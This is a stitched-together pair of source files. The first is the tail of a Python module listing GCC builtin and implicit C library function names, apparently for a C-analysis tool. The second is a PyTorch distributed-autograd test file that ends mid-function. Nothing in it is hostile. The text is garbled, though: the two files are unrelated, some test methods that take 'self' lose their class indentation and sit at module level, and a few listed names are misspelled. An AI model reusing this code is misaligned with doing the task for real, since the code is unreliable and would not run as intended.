__attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
extern int fprintf (FILE *__restrict __stream,
const char *__restrict __format, ...);
extern void *malloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__malloc__));
extern void *memcpy (void *__restrict __dest, const void *__restrict __src,
size_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
"""
GCC_BUILTINS = [
'cos',
'sin',
'tan',
'acos',
'asin',
'atan',
'atan2',
'cosh',
'sinh',
'tanh',
'acosh',
'asinh',
'atanh',
'exp',
'frexp',
'ldexp',
'log',
'log10',
'modf',
'exp2',
'expm1',
'iologb',
'log1p',
'log2',
'logb',
'scalbn',
'scalbln',
'pow',
'sqrt',
'cbrt',
'hypot',
'erf',
'erfc',
'tgamma',
'lgamma',
'ceil',
'floor',
'fmod',
'trunc',
'round',
'lround',
'llround',
'rint',
'lrint',
'nearbyint',
'remainder',
'remquo',
'copysing',
'nan',
'nanf',
'nanl',
'nextafter',
'nettoward',
'fdim',
'fmax',
'fmal',
'fmin',
'fabs',
'abs',
'fma',
'fpclassify',
'fpclassifyf',
'fpclassifyl',
'isfinite',
'isfinitef',
'isfinitel',
'finite',
'finitef',
'finitel',
'isinf',
'isinff',
'isinfl',
'isnan',
'isnanf',
'isnanl',
'isnormal',
'signbit',
'signbitf',
'signbitl',
'isgreater',
'isgreaterequal',
'isless',
'islessequal',
'islessgreater',
'isunordered',
'_Exit',
'acoshf',
'acoshl',
'acosh',
'asinhf',
'asinhl',
'asinh',
'atanhf',
'atanhl',
'atanh',
'cabsf',
'cabsl',
'cabs',
'cacosf',
'cacoshf',
'cacoshl',
'cacosh',
'cacosl',
'cacos',
'cargf',
'cargl',
'carg',
'casinf',
'casinhf',
'casinhl',
'casinh',
'casinl',
'casin',
'catanf',
'catanhf',
'catanhl',
'catanh',
'catanl',
'catan',
'cbrtf',
'cbrtl',
'cbrt',
'ccosf',
'ccoshf',
'ccoshl',
'ccosh',
'ccosl',
'ccos',
'cexpf',
'cexpl',
'cexp',
'cimagf',
'cimagl',
'cimag',
'clogf',
'clogl',
'clog',
'conjf',
'conjl',
'conj',
'copysignf',
'copysignl',
'copysign',
'cpowf',
'cpowl',
'cpow',
'cprojf',
'cprojl',
'cproj',
'crealf',
'creall',
'creal',
'csinf',
'csinhf',
'csinhl',
'csinh',
'csinl',
'csin',
'csqrtf',
'csqrtl',
'csqrt',
'ctanf',
'ctanhf',
'ctanhl',
'ctanh',
'ctanl',
'ctan',
'erfcf',
'erfcl',
'erfc',
'erff',
'erfl',
'erf',
'exp2f',
'exp2l',
'exp2',
'expm1f',
'expm1l',
'expm1',
'fdimf',
'fdiml',
'fdim',
'fmaf',
'fmal',
'fmaxf',
'fmaxl',
'fmax',
'fma',
'fminf',
'fminl',
'fmin',
'hypotf',
'hypotl',
'hypot',
'ilogbf',
'ilogbl',
'ilogb',
'imaxabs',
'isblank',
'iswblank',
'lgammaf',
'lgammal',
'lgamma',
'llabs',
'llrintf',
'llrintl',
'llrint',
'llroundf',
'llroundl',
'llround',
'log1pf',
'log1pl',
'log1p',
'log2f',
'log2l',
'log2',
'logbf',
'logbl',
'logb',
'lrintf',
'lrintl',
'lrint',
'lroundf',
'lroundl',
'lround',
'nearbyintf',
'nearbyintl',
'nearbyint',
'nextafterf',
'nextafterl',
'nextafter',
'nexttowardf',
'nexttowardl',
'nexttoward',
'remainderf',
'remainderl',
'remainder',
'remquof',
'remquol',
'remquo',
'rintf',
'rintl',
'rint',
'roundf',
'roundl',
'round',
'scalblnf',
'scalblnl',
'scalbln',
'scalbnf',
'scalbnl',
'scalbn',
'snprintf',
'tgammaf',
'tgammal',
'tgamma',
'truncf',
'truncl',
'trunc',
'vfscanf',
'vscanf',
'vsnprintf',
'acosf',
'acosl',
'asinf',
'asinl',
'atan2f',
'atan2l',
'atanf',
'atanl',
'ceilf',
'ceill',
'cosf',
'coshf',
'coshl',
'cosl',
'expf',
'expl',
'fabsf',
'fabsl',
'floorf',
'floorl',
'fmodf',
'fmodl',
'frexpf',
'frexpl',
'ldexpf',
'ldexpl',
'log10f',
'log10l',
'logf',
'logl',
'modfl',
'modf',
'powf',
'powl',
'sinf',
'sinhf',
'sinhl',
'sinl',
'sqrtf',
'sqrtl',
'tanf',
'tanhf',
'tanhl',
'tanl',
# Outside c99 and c89
'_exit',
'alloca',
'bcmp',
'bzero',
'dcgettext',
'dgettext',
'dremf',
'dreml',
'drem',
'exp10f',
'exp10l',
'exp10',
'ffsll',
'ffs',
'fprintf_unlocked',
'fputs_unlocked',
'gammaf',
'gammal',
'gamma',
'gammaf_r',
'gammal_r',
'gamma_r',
'gettext',
'index',
'isascii',
'j0f',
'j0l',
'j0',
'j1f',
'j1l',
'j1',
'jnf',
'jnl',
'jn',
'lgammaf_r',
'lgammal_r',
'lgamma_r',
'mempcpy',
'pow10f',
'pow10l',
'pow10',
'printf_unlocked',
'rindex',
'scalbf',
'scalbl',
'scalb',
'signbit',
'signbitf',
'signbitl',
'signbitd32',
'signbitd64',
'signbitd128',
'significandf',
'significandl',
'significand',
'sincosf',
'sincosl',
'sincos',
'stpcpy',
'stpncpy',
'strcasecmp',
'strdup',
'strfmon',
'strncasecmp',
'strndup',
'toascii',
'y0f',
'y0l',
'y0',
'y1f',
'y1l',
'y1',
'ynf',
'ynl',
'yn',
'abort',
'abs',
'acos',
'asin',
'atan2',
'atan',
'calloc',
'ceil',
'cosh',
'cos',
'exit',
'exp',
'fabs',
'floor',
'fmod',
'fprintf',
'fputs',
'frexp',
'fscanf',
'labs',
'ldexp',
'log10',
'log',
'malloc',
'memcmp',
'memcpy',
'memset',
'modf',
'modff',
'modfl',
'pow',
'printf',
'putchar',
'puts',
'scanf',
'sinh',
'sin',
'snprintf',
'sprintf',
'sqrt',
'sscanf',
'strcat',
'strchr',
'strcmp',
'strcpy',
'strcspn',
'strlen',
'strncat',
'strncmp',
'strncpy',
'strpbrk',
'strrchr',
'strspn',
'strstr',
'tanh',
'tan',
'vfprintf',
'vprintf',
'vsprintf'
]
IMPLICIT_FUNCTIONS = [
'__VERIFIER_assume',
# stdio.h
'fclose',
'clearerr',
'feof',
'ferror',
'fflush',
'fgetpos',
'fopen',
'fread',
'freopen',
'fseek',
'fsetpos',
'ftell',
'fwrite',
'remove',
'rename',
'rewind',
'setbuf',
'setvbuf',
'tmpfile',
'tmpnam',
'fprintf',
'printf',
'sprintf',
'vfprintf',
'vprintf',
'vsprintf',
'fscanf',
'scanf',
'sscanf',
'fgetc',
'fgets',
'fputc',
'fputs',
'getc',
'getchar',
'gets',
'putc',
'putchar',
'puts',
'ungetc',
'perror',
# stdlib.h
'atoi',
'atof',
'atol',
'atoll',
'strtod',
'strtol',
'strtoll',
'strtoq',
'strtold',
'strtof',
'strtoul',
'strtoull',
'calloc',
'free',
'malloc',
'realloc',
'alloca',
'valloc',
'abort',
'atexit',
'exit',
'getenv',
'system',
'bsearch',
'qsort',
'abs',
'div',
'labs',
'ldiv',
'mblen',
'mbstowcs',
'mbtowc',
'wcstombs',
'wctomb',
# string.h
'memchr',
'memcmp',
'memcpy',
'memmove',
'memset',
'strcat',
'strncat',
'strchr',
'strcmp',
'strncmp',
'strcoll',
'strcpy',
'strncpy',
'strcspn',
'strerror',
'strlen',
'strpbrk',
'strrchr',
'strspn',
'strstr',
'strtok',
'strxfrm',
# fenv.h
'feclearexcpt',
'feraiseexcept',
'fegetexceptflag',
'fesetexceptflag',
'fegetround',
'fesetround',
'fegetenv',
'fesetenv',
'feholdexcept',
'feupdateenv',
'fetestexcept',
'__underflow',
'__uflow',
'__overflow',
'_IO_getc',
'_IO_putc',
'_IO_feof',
'_IO_ferror',
'_IO_peekc_locked',
'_IO_flockfile',
'_IO_funlockfile',
'_IO_ftrylockfile',
'_IO_vfscanf',
'_IO_fprintf',
'_IO_padn',
'_IO_seekoff',
'_IO_seekpos',
'_IO_free_backup_area'
] + GCC_BUILTINS + ['__' + g for g in GCC_BUILTINS
] + ["__builtin__" + g for g in GCC_BUILTINS]
|
dist_autograd_test.py | import sys
import threading
import time
from enum import Enum
import random
import torch
import torch.nn as nn
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.distributed.rpc import RRef
from torch.testing._internal.common_utils import IS_MACOS, sandcastle_skip_if
from torch.testing._internal.dist_utils import (
dist_init,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] represent rpc is done in prev rank, and context id
# sent from prev rank respectively.
# rpc_done[2] and ctx_ids[2] represents for prev of prev rank.
# rpc_done[3] and ctx_ids[3] represents for prev of prev of prev rank.
# rpc_done[0] and ctx_ids[0] represents for current rank, but mostly not used.
# Per-rank "RPC finished" flags and context ids, indexed by rank distance
# (see the explanation in the comments above).
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
# All autograd context ids ever reported to this worker.
known_context_ids = set()
# Shared grad-requiring leaf tensor, returned by ret_requires_grad().
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
    """Record that the rank at *rank_distance* finished its RPC with context *ctx_id*."""
    global rpc_done
    global ctx_ids
    global known_context_ids
    rpc_done[rank_distance] = True
    ctx_ids[rank_distance] = ctx_id
    known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
    """Block (polling) until the rank at *rank_distance* reported its RPC as done."""
    while not rpc_done[rank_distance]:
        time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# rref tensor equals to the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
x = grads[rref.local_value()]
if x.is_sparse:
assert grad.is_sparse
x = x.to_dense()
grad = grad.to_dense()
else:
assert not grad.is_sparse
return torch.equal(x, grad)
def create_tensor():
    """Return a fresh 3x3 ones tensor that requires grad."""
    return torch.ones((3, 3)).requires_grad_()
def build_sparse_tensor(coalesce=False, requires_grad=True, dtype=torch.float32, device=None):
    """Return a fixed 3x3 sparse COO tensor with three nonzero entries."""
    indices = [[0, 1, 1], [2, 0, 2]]
    values = [3.2, 4.1, 5.3]
    result = torch.sparse_coo_tensor(
        indices, values, (3, 3),
        requires_grad=requires_grad, dtype=dtype, device=device)
    return result.coalesce() if coalesce else result
def build_sparse_one_gradient(dtype=torch.float32):
    """Return a sparse 3x3 tensor of ones at the same positions as build_sparse_tensor."""
    indices = [[0, 1, 1], [2, 0, 2]]
    ones = [1, 1, 1]
    return torch.sparse_coo_tensor(indices, ones, (3, 3), dtype=dtype)
@torch.jit.script
def create_torchscript_tensor() -> torch.Tensor:
    """TorchScript variant of create_tensor: 3x3 ones that require grad."""
    return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
    """Plain Python wrapper around torch.add, used as an RPC target."""
    result = torch.add(t1, t2)
    return result
def my_scalar_add(a, b):
    """Add two scalars (simple RPC target)."""
    total = a + b
    return total
def my_rref_add(rref_t1, t2):
    """Add *t2* to the tensor held locally by *rref_t1* (owner-side RRef)."""
    local_tensor = rref_t1.local_value()
    return torch.add(local_tensor, t2)
def my_sum(t):
    """Sum all entries of *t*, using torch.sparse.sum for sparse tensors."""
    if t.is_sparse:
        return torch.sparse.sum(t)
    return t.sum()
@torch.jit.script
def my_script_add(t1, t2):
    """TorchScript add, used to exercise script-function RPCs."""
    return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1: RRef[torch.Tensor], t2: torch.Tensor) -> torch.Tensor:
    """TorchScript function that fetches an RRef's tensor and adds *t2* to it."""
    t1 = ref_t1.to_here()
    return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
    """Forward an rref-add to worker *dst* via a nested synchronous RPC."""
    return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
    """Return the module-level grad-requiring tensor (RPC target)."""
    return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
    """Chain rpc_sync calls across *hops* workers; the last hop adds t1 and t2."""
    next_dst = (dst + 1) % world_size
    if hops > 0:
        return rpc.rpc_sync(
            worker_name(next_dst),
            my_py_nested_call,
            args=(t1, t2, next_dst, world_size, hops - 1),
        )
    else:
        return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# After a dist autograd context is cleaned up locally, it should also be
# cleaned up on the other nodes. This helper allows timeout_seconds for those
# RPCs to complete, and checks that all contexts were cleaned up in that
# time frame.
def _all_contexts_cleaned_up(timeout_seconds=10):
    """Poll until every known autograd context is gone or the timeout expires.

    :return: True iff retrieving each known context id raises RuntimeError
    """
    global known_context_ids
    start = time.time()
    context_id_to_raised = set()
    while (
        time.time() - start < timeout_seconds
        and context_id_to_raised != known_context_ids
    ):
        for context_id in known_context_ids:
            try:
                dist_autograd._retrieve_context(context_id)
            except RuntimeError:
                context_id_to_raised.add(context_id)
    # all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
    success = context_id_to_raised == known_context_ids
    return success
# This function creates a dist autograd context, runs rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
    """Run one rref-add/backward step against parameter server *ps* and signal completion."""
    with dist_autograd.context() as context_id:
        ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
        loss = my_sum(ret)
        dist_autograd.backward(context_id, [loss])
        # prevent deleting dist autograd context
        rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
        rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except that the rpc call invokes
# the TorchScript function "my_script_ref_add" instead of the Python
# function "my_rref_add".
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
    """TorchScript variant of _run_trainer: uses my_script_ref_add as the RPC target."""
    with dist_autograd.context() as context_id:
        ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
        loss = my_sum(ret)
        dist_autograd.backward(context_id, [loss])
        # prevent deleting dist autograd context
        rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
        rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
    """Identity autograd Function whose backward raises while _simulate_error is set."""

    # Toggle for tests: when True, backward() raises instead of returning.
    _simulate_error = True

    @staticmethod
    def forward(ctx, input):
        # Identity in the forward pass.
        return input

    @staticmethod
    @once_differentiable
    def backward(ctx, input):
        if SimulateBackwardError._simulate_error:
            raise Exception("Simulate error on backward pass")
        else:
            return input
class ExecMode(Enum):
    """How a test helper executes an operation."""
    LOCAL = 1  # Run the operation locally.
    RPC_SYNC = 2  # Run the operation using rpc_sync
    REMOTE = 3  # Run the operation using remote.
    RPC_ASYNC = 4  # Run the operation using rpc_async
# Common utils for both CPU and CUDA test suites
class CommonDistAutogradTest(RpcAgentTestFixture):
    """Shared helpers for the CPU and CUDA dist-autograd test suites."""

    def _exec_func_with_dst(self, dst, exec_mode, method, *args):
        """Run *method* on worker *dst* according to *exec_mode* and return its result."""
        if ExecMode.LOCAL == exec_mode:
            if len(args) == 1 and isinstance(args[0], list):
                return method(*args[0])
            return method(*args)
        elif ExecMode.RPC_SYNC == exec_mode:
            return rpc.rpc_sync(worker_name(dst), method, args=(args))
        elif ExecMode.REMOTE == exec_mode:
            return rpc.remote(worker_name(dst), method, args=(args)).to_here()
        elif ExecMode.RPC_ASYNC == exec_mode:
            fut = rpc.rpc_async(worker_name(dst), method, args=(args))
            return fut.wait()
        else:
            raise ValueError("Unrecognized ExecMode {}".format(exec_mode))

    def _exec_func(self, exec_mode, method, *args):
        """Like _exec_func_with_dst, but targets the next round-robin rank."""
        return self._exec_func_with_dst(
            self._next_rank(), exec_mode, method, *args
        )

    def _next_rank(self):
        """Return the next destination rank in round-robin order, skipping self."""
        if hasattr(self, "dst_rank"):
            self.dst_rank = (self.dst_rank + 1) % self.world_size
            if self.dst_rank == self.rank:
                return self._next_rank()
        else:
            self.dst_rank = (self.rank + 1) % self.world_size
        return self.dst_rank

    def _check_rpc_done(self, rank_distance):
        # Delegates to the module-level helper that polls rpc_done.
        _check_rpc_done(rank_distance)

    def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
        """Run backward in the given mode; returns the local grads only in LOCAL mode."""
        if exec_mode == ExecMode.LOCAL:
            torch.autograd.backward(tensors)
            return [arg.grad for arg in args]
        else:
            # Remote verification; implicitly returns None.
            self._verify_backwards_remote(tensors, context_id, local_grads, *args)

    def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
        """Run dist_autograd.backward and check the accumulated grads match *local_grads*."""
        dist_autograd.backward(context_id, tensors)
        # Verify grads were accumulated appropriately.
        grads = dist_autograd.get_gradients(context_id)
        nargs = len(args)
        ngrads = 0
        for i in range(0, nargs):
            if local_grads[i] is not None:
                self.assertIn(args[i], grads)
                self.assertEqual(local_grads[i], grads[args[i]])
                ngrads += 1
            else:
                self.assertNotIn(args[i], grads)
        self.assertEqual(ngrads, len(grads))
class DistAutogradTest(CommonDistAutogradTest):
    @dist_init
    def test_autograd_context(self):
        """Context ids encode the worker id in the top 16 bits and are cleaned up on exit."""
        # Verify max possible id.
        max_auto_increment = 281474976710655
        self.assertEqual(
            max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
        )
        context_ids = []
        for i in range(200):
            with dist_autograd.context() as context_id:
                self.assertEqual(
                    context_id,
                    dist_autograd._retrieve_context(context_id)._context_id(),
                )
                # First 16 bits should be worker_id.
                self.assertEqual(self.worker_id, context_id >> 48)
                context_ids.append(context_id)
        # Leaving the `with` block must have destroyed every context.
        for context_id in context_ids:
            with self.assertRaisesRegex(
                RuntimeError,
                "Could not find autograd context with id: {}".format(context_id),
            ):
                dist_autograd._retrieve_context(context_id)
    @dist_init
    def test_nested_context(self):
        """Opening a second autograd context on the same thread must fail."""
        with dist_autograd.context() as context_id:
            # Nested contexts not supported.
            with self.assertRaisesRegex(
                RuntimeError, "Already have an autograd context id for this thread"
            ):
                with dist_autograd.context() as context_id:
                    pass
# For current context, this rank sends t1 and t2 tensors to dst_rank,
# then get t3 = torch.add(t1, t2) result tensor.
# For the current context in this rank, it expects graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
# t3.rpcRecvBackward
#
    def _verify_graph_for_first_rpc_call(
        self, send_function, recv_function, t1, t2, ret
    ):
        """Check the send/recv autograd graph of the first rpc call (see the diagram above)."""
        # Retrieve the next functions in the graph.
        next_funcs = send_function.next_functions
        self.assertEqual(2, len(next_funcs))
        # We should now hit t1 and t2 in the autograd graph.
        self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
        self.assertEqual(t1, next_funcs[0][0].variable)
        self.assertEqual(0, next_funcs[0][1])
        self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
        self.assertEqual(t2, next_funcs[1][0].variable)
        self.assertEqual(0, next_funcs[1][1])
        # Test recv functions.
        self.assertEqual(ret.grad_fn, recv_function)
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
# result tensor t3 back.
# For this context in this rank, it expects graph like this:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
    def _verify_graph_for_rpc_call_exec(self, send_function):
        """Check the graph on the rank executing the nested call (see the diagram above)."""
        # Verify next function is AddBackward0
        next_funcs = send_function.next_functions
        self.assertEqual(1, len(next_funcs))
        add_backward_fn = next_funcs[0][0]
        self.assertEqual("AddBackward0", add_backward_fn.name())
        # Verify the next two functions are the same recv backward function.
        next_funcs = add_backward_fn.next_functions
        self.assertEqual(2, len(next_funcs))
        self.assertEqual(
            "torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
        )
        self.assertEqual(
            "torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
        )
        self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, forwards t1 and t2 tensors using
# nested rpc call to next dst. In return route, receive result tensor t3
# from next dst and forwarding t3 back to previous calls.
# For this context in this rank, it expects graph like this:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
    def _verify_graph_for_nested_rpc_call(self, ctx):
        """Check the graph on a forwarding rank of a nested call (see the diagram above)."""
        send_functions = ctx._send_functions()
        self.assertEqual(2, len(send_functions))
        # For the send function when making the nested rpc call,
        # next functions of the send function are two recv functions
        # for the two tensors received from the previous call
        next_funcs = list(send_functions.values())[0].next_functions
        self.assertEqual(2, len(next_funcs))
        self.assertEqual(
            "torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
        )
        self.assertEqual(
            "torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
        )
        self.assertEqual(next_funcs[0][0], next_funcs[1][0])
        # For the send function when returning the response to the previous
        # call, the next function of the send function is the recv function
        # for the result tensor returned from the nested call
        next_funcs = list(send_functions.values())[1].next_functions
        self.assertEqual(1, len(next_funcs))
        self.assertEqual(
            "torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
        )
def _test_graph(self, fn, exec_mode, sparse):
    """Run ``fn(t1, t2)`` on the next rank and verify the autograd graphs
    recorded for both the current context and the callee's context.

    Args:
        fn: function executed remotely on the two input tensors.
        exec_mode: ExecMode.RPC_SYNC or ExecMode.REMOTE.
        sparse: if True, use sparse input tensors instead of dense ones.

    Raises:
        ValueError: if exec_mode is neither RPC_SYNC nor REMOTE.
    """
    dst_rank = (self.rank + 1) % self.world_size
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    with dist_autograd.context() as context_id:
        if sparse:
            t1 = build_sparse_tensor()
            t2 = build_sparse_tensor()
        else:
            t1 = torch.ones(3, 3, requires_grad=True)
            t2 = torch.zeros(3, 3, requires_grad=True)
        if ExecMode.RPC_SYNC == exec_mode:
            ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
        elif ExecMode.REMOTE == exec_mode:
            ret = rpc.remote(
                worker_name(dst_rank), fn, args=(t1, t2)
            ).to_here()
        else:
            raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
        # Tell the callee we are done so it records our context id on its side.
        rpc.rpc_sync(
            worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
        )
        # Verify graph for current context id.
        ctx = dist_autograd._current_context()
        self.assertEqual(context_id, ctx._context_id())
        send_functions = ctx._send_functions()
        self.assertEqual(1, len(send_functions))
        recv_functions = ctx._recv_functions()
        self.assertEqual(1, len(recv_functions))
        self._verify_graph_for_first_rpc_call(
            list(send_functions.values())[0],
            list(recv_functions.values())[0],
            t1,
            t2,
            ret,
        )
        # Wait for the prev rank to be done with rpc.
        self._check_rpc_done(1)
        # Verify graph for previous context id.
        # NOTE(review): ctx_ids appears to be module-level state populated by
        # _set_rpc_done, mapping rank-distance -> peer context id — confirm.
        ctx = dist_autograd._retrieve_context(ctx_ids[1])
        send_functions = ctx._send_functions()
        self.assertEqual(1, len(send_functions))
        self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
        # this barrier is needed so one worker does not clean up their
        # autograd context before another worker tries to access it.
        dist.barrier()
    # autograd context should be cleaned up by now.
    with self.assertRaises(RuntimeError):
        ctx = dist_autograd._retrieve_context(context_id)
    # No autograd context available.
    with self.assertRaises(RuntimeError):
        ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
    """Autograd graph for a builtin op sent via rpc_sync (dense tensors)."""
    self._test_graph(fn=torch.add, exec_mode=ExecMode.RPC_SYNC, sparse=False)
@dist_init
def test_graph_for_builtin_call_sparse(self):
    """Autograd graph for a builtin op sent via rpc_sync (sparse tensors)."""
    self._test_graph(fn=torch.add, exec_mode=ExecMode.RPC_SYNC, sparse=True)
@dist_init
def test_graph_for_python_call(self):
    """Autograd graph for a Python UDF sent via rpc_sync (dense tensors)."""
    self._test_graph(fn=my_py_add, exec_mode=ExecMode.RPC_SYNC, sparse=False)
@dist_init
def test_graph_for_python_call_sparse(self):
    """Autograd graph for a Python UDF sent via rpc_sync (sparse tensors)."""
    self._test_graph(fn=my_py_add, exec_mode=ExecMode.RPC_SYNC, sparse=True)
@dist_init
def test_graph_for_builtin_remote_call(self):
    """Autograd graph for a builtin op via rpc.remote (dense tensors)."""
    self._test_graph(fn=torch.add, exec_mode=ExecMode.REMOTE, sparse=False)
@dist_init
def test_graph_for_builtin_remote_call_sparse(self):
    """Autograd graph for a builtin op via rpc.remote (sparse tensors)."""
    self._test_graph(fn=torch.add, exec_mode=ExecMode.REMOTE, sparse=True)
@dist_init
def test_graph_for_python_remote_call(self):
    """Autograd graph for a Python UDF via rpc.remote (dense tensors)."""
    self._test_graph(fn=my_py_add, exec_mode=ExecMode.REMOTE, sparse=False)
@dist_init
def test_graph_for_python_remote_call_sparse(self):
    """Autograd graph for a Python UDF via rpc.remote (sparse tensors)."""
    self._test_graph(fn=my_py_add, exec_mode=ExecMode.REMOTE, sparse=True)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode, sparse):
    """Issue a 3-hop nested RPC chain and verify the autograd graphs on all
    four contexts this rank participates in (its own, the two intermediate
    forwarding contexts, and the context that executed the final op).

    Args:
        exec_mode: ExecMode.RPC_SYNC or ExecMode.REMOTE.
        sparse: if True, use sparse input tensors instead of dense ones.

    Raises:
        ValueError: if exec_mode is neither RPC_SYNC nor REMOTE.
    """
    dst_rank = (self.rank + 1) % self.world_size
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    with dist_autograd.context() as context_id:
        if sparse:
            t1 = build_sparse_tensor(requires_grad=True)
            t2 = build_sparse_tensor(requires_grad=True)
        else:
            t1 = torch.ones(3, 3, requires_grad=True)
            t2 = torch.zeros(3, 3, requires_grad=True)
        # NOTE(review): removed unused local `nest_dst_rank` — it was computed
        # but never read; the nested destination is derived from the args
        # passed to my_py_nested_call.
        if ExecMode.RPC_SYNC == exec_mode:
            ret = rpc.rpc_sync(
                worker_name(dst_rank),
                my_py_nested_call,
                args=(t1, t2, dst_rank, self.world_size, 1),
            )
        elif ExecMode.REMOTE == exec_mode:
            ret = rpc.remote(
                worker_name(dst_rank),
                my_py_nested_call,
                args=(t1, t2, dst_rank, self.world_size, 1),
            ).to_here()
        else:
            raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
        # Barrier to ensure all RPCs are done.
        dist.barrier()
        for rd in [1, 2, 3]:
            rpc.rpc_sync(
                worker_name((self.rank + rd) % self.world_size),
                _set_rpc_done,
                args=(context_id, rd),
            )
        # Barrier to ensure all set_rpc_done have completed.
        dist.barrier()
        # For self.rank, it has 4 graphs to verify:
        # One is for the current context id when this rank sends the first
        # rpc call.
        # Second one is for the prev context id when this rank makes the 1st
        # nested call.
        # Third one is for the prev prev context id when this rank makes the
        # 2nd nested call.
        # Last one is for the prev prev prev context id when this rank
        # executes the torch.add() operator.
        # Verify first graph for current context id.
        ctx = dist_autograd._current_context()
        self.assertEqual(context_id, ctx._context_id())
        send_functions = ctx._send_functions()
        self.assertEqual(1, len(send_functions))
        recv_functions = ctx._recv_functions()
        self.assertEqual(1, len(recv_functions))
        self._verify_graph_for_first_rpc_call(
            list(send_functions.values())[0],
            list(recv_functions.values())[0],
            t1,
            t2,
            ret,
        )
        # Verify second graph for 1st nested call.
        ctx = dist_autograd._retrieve_context(ctx_ids[1])
        self._verify_graph_for_nested_rpc_call(ctx)
        # Verify third graph for 2nd nested call.
        ctx = dist_autograd._retrieve_context(ctx_ids[2])
        self._verify_graph_for_nested_rpc_call(ctx)
        # Verify last graph for rpc call execution.
        ctx = dist_autograd._retrieve_context(ctx_ids[3])
        send_functions = ctx._send_functions()
        self.assertEqual(1, len(send_functions))
        self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
        # this barrier is needed so one worker does not clean up their
        # autograd context before another worker tries to access it.
        dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
    """Nested 3-hop chain via rpc_sync (dense tensors)."""
    self._test_graph_for_py_nested_call(
        exec_mode=ExecMode.RPC_SYNC, sparse=False
    )
@dist_init
def test_graph_for_py_nested_call_sparse(self):
    """Nested 3-hop chain via rpc_sync (sparse tensors)."""
    self._test_graph_for_py_nested_call(
        exec_mode=ExecMode.RPC_SYNC, sparse=True
    )
@dist_init
def test_graph_for_py_nested_remote_call(self):
    """Nested 3-hop chain via rpc.remote (dense tensors)."""
    self._test_graph_for_py_nested_call(
        exec_mode=ExecMode.REMOTE, sparse=False
    )
@dist_init
def test_graph_for_py_nested_remote_call_sparse(self):
    """Nested 3-hop chain via rpc.remote (sparse tensors)."""
    self._test_graph_for_py_nested_call(
        exec_mode=ExecMode.REMOTE, sparse=True
    )
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode, sparse):
